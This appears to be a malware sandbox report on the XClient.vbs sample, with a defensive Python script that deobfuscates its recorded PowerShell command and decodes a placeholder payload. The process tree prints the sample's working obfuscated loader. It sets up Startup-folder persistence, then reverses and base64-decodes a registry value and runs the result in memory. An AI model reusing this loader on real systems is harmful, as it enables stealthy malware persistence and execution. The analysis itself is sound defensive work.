Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/06/2024, 18:06

General

  • Target

    XClient.vbs

  • Size

    51KB

  • MD5

    b2d3d950c164eac3905adf7449bbc102

  • SHA1

    bfa01bfaa12aefce0bc8f7468ce788d78623c56d

  • SHA256

    79ba69baace5e2b30cdc18e8ab462692e3337640f52f532743ffb2a52c281694

  • SHA512

    6032364e7b7e107f0813eee20304ec31e65747b10174fba9d703d20c010c8785df515a0789f8e813484ae7d09e972100b2dd08df46dcb0844e9911feddadab74

  • SSDEEP

    1536:daxTfSWi9SkelLyAPh0voJKfI2rygScsddWZrv+Va:0xTfk9reVUvWII2oJdWZT+Va

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XClient.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\XClient.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.vbs'; $possessiveness = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $possessiveness = -join $possessiveness[-1..-$possessiveness.Length];[<##>AppDomain<##>]::<##>('merelsurrentDomain'.replace('merels','C'))<##>.<##>('liquationoad'.replace('liquation','L'))([Convert]::FromBase64String($possessiveness))<##>.<##>('microzoarianntryPoint'.replace('microzoarian','E'))<##>.<##>('Inconfrontmentoke'.replace('confrontment','v'))($Null,$Null)<##>;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3004
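The command line for PID 3004 is the substance of this report: powershell.exe is launched with -exec bypass and -window 1 (hidden window), copies the script into the user's Startup folder as "Windows backup.vbs" for persistence, reads a string from the Updates value under HKCU:\Software\Chrome, reverses it, base64-decodes it, and loads the result as a .NET assembly in-process via [AppDomain]::CurrentDomain.Load(...).EntryPoint.Invoke(). The member names are hidden behind 'junk'.replace('junk','X') string rebuilds and empty <##> block comments so that "Load", "EntryPoint" and "Invoke" never appear literally on the command line. Nothing but the Startup copy touches disk, which matches the only artifacts the sandbox collected being memory dumps from PID 3004. The Python below is an added example, not part of the tria.ge report or the sample: it deobfuscates that command line, extracts the persistence path and registry location, and shows how to recover a registry-staged payload without executing it. The registry contents were not extracted in this run (Malware Config is empty), so the sample value is a constructed placeholder, not the real payload.

```python
import base64
import re

# The -Command argument recorded for PID 3004 in the process tree above (copied
# from the report; backslashes are doubled only for Python's sake).
OBFUSCATED = (
    "Copy-Item 'C:\\Users\\Admin\\AppData\\Local\\Temp\\XClient.vbs' "
    "'C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Windows backup.vbs'; "
    "$possessiveness = ((Get-ItemProperty HKCU:\\Software\\Chrome\\).Updates); "
    "$possessiveness = -join $possessiveness[-1..-$possessiveness.Length];"
    "[<##>AppDomain<##>]::<##>('merelsurrentDomain'.replace('merels','C'))<##>.<##>"
    "('liquationoad'.replace('liquation','L'))([Convert]::FromBase64String($possessiveness))<##>.<##>"
    "('microzoarianntryPoint'.replace('microzoarian','E'))<##>.<##>"
    "('Inconfrontmentoke'.replace('confrontment','v'))($Null,$Null)<##>;"
)

# 'junkName'.replace('junk','X'): a string literal rebuilt at runtime.
REPLACE_LITERAL = re.compile(r"'([^']*)'\.replace\('([^']*)','([^']*)'\)")
# obj.('Name') / [Type]::('Name'): PowerShell accepts a string expression as a member name.
DYNAMIC_MEMBER = re.compile(r"(::|\.)\('([A-Za-z_][A-Za-z0-9_]*)'\)")


def deobfuscate(cmd: str) -> str:
    """Undo the three tricks in the command line and return readable PowerShell."""
    # 1. <##> is an empty block comment that the parser discards.
    cmd = cmd.replace("<##>", "")
    # 2. Evaluate the .replace() calls (String.Replace is ordinal, like Python's).
    cmd = REPLACE_LITERAL.sub(
        lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", cmd)
    # 3. Turn .('Load') into .Load so the member chain reads normally.
    cmd = DYNAMIC_MEMBER.sub(r"\1\2", cmd)
    return cmd


def extract_indicators(cmd: str) -> dict:
    """Host-based indicators a responder would sweep for: the Startup-folder copy
    and the registry key/value the payload is staged in."""
    copy = re.search(r"Copy-Item '([^']+)' '([^']+)'", cmd)
    key = re.search(r"Get-ItemProperty (HKCU:\\[^)\s]+)\)\.(\w+)", cmd)
    return {
        "startup_copy": copy.group(2) if copy else None,
        "registry_key": key.group(1) if key else None,
        "registry_value": key.group(2) if key else None,
    }


def recover_payload(reg_value: str) -> bytes:
    """Do what the loader does minus the Load/Invoke: reverse the string
    (-join $s[-1..-$s.Length]) and base64-decode it."""
    return base64.b64decode(reg_value[::-1])


def looks_like_pe(blob: bytes) -> bool:
    """Assembly.Load expects a PE image, so a real payload starts with 'MZ'."""
    return blob[:2] == b"MZ"


# Constructed stand-in for the HKCU\Software\Chrome "Updates" value. The report
# extracted no config, so this is NOT the real payload: just an MZ-prefixed blob
# stored the way the loader expects it (base64, then character-reversed).
FAKE_ASSEMBLY = b"MZ" + b"\x00" * 62 + b"constructed placeholder, not the real XClient payload"
SAMPLE_REG_VALUE = base64.b64encode(FAKE_ASSEMBLY).decode()[::-1]

if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
    print(extract_indicators(OBFUSCATED))
    payload = recover_payload(SAMPLE_REG_VALUE)
    print(len(payload), "bytes recovered, PE header:", looks_like_pe(payload))
```

On a live host, the same recovery applies to the real value: export HKCU\Software\Chrome from the affected profile, reverse and decode the Updates string, and hand the resulting assembly to a .NET decompiler rather than letting powershell.exe invoke it.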

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/3004-4-0x000007FEF5F9E000-0x000007FEF5F9F000-memory.dmp

    Filesize

    4KB

  • memory/3004-5-0x000000001B880000-0x000000001BB62000-memory.dmp

    Filesize

    2.9MB

  • memory/3004-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

  • memory/3004-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

  • memory/3004-8-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB

  • memory/3004-9-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

    Filesize

    9.6MB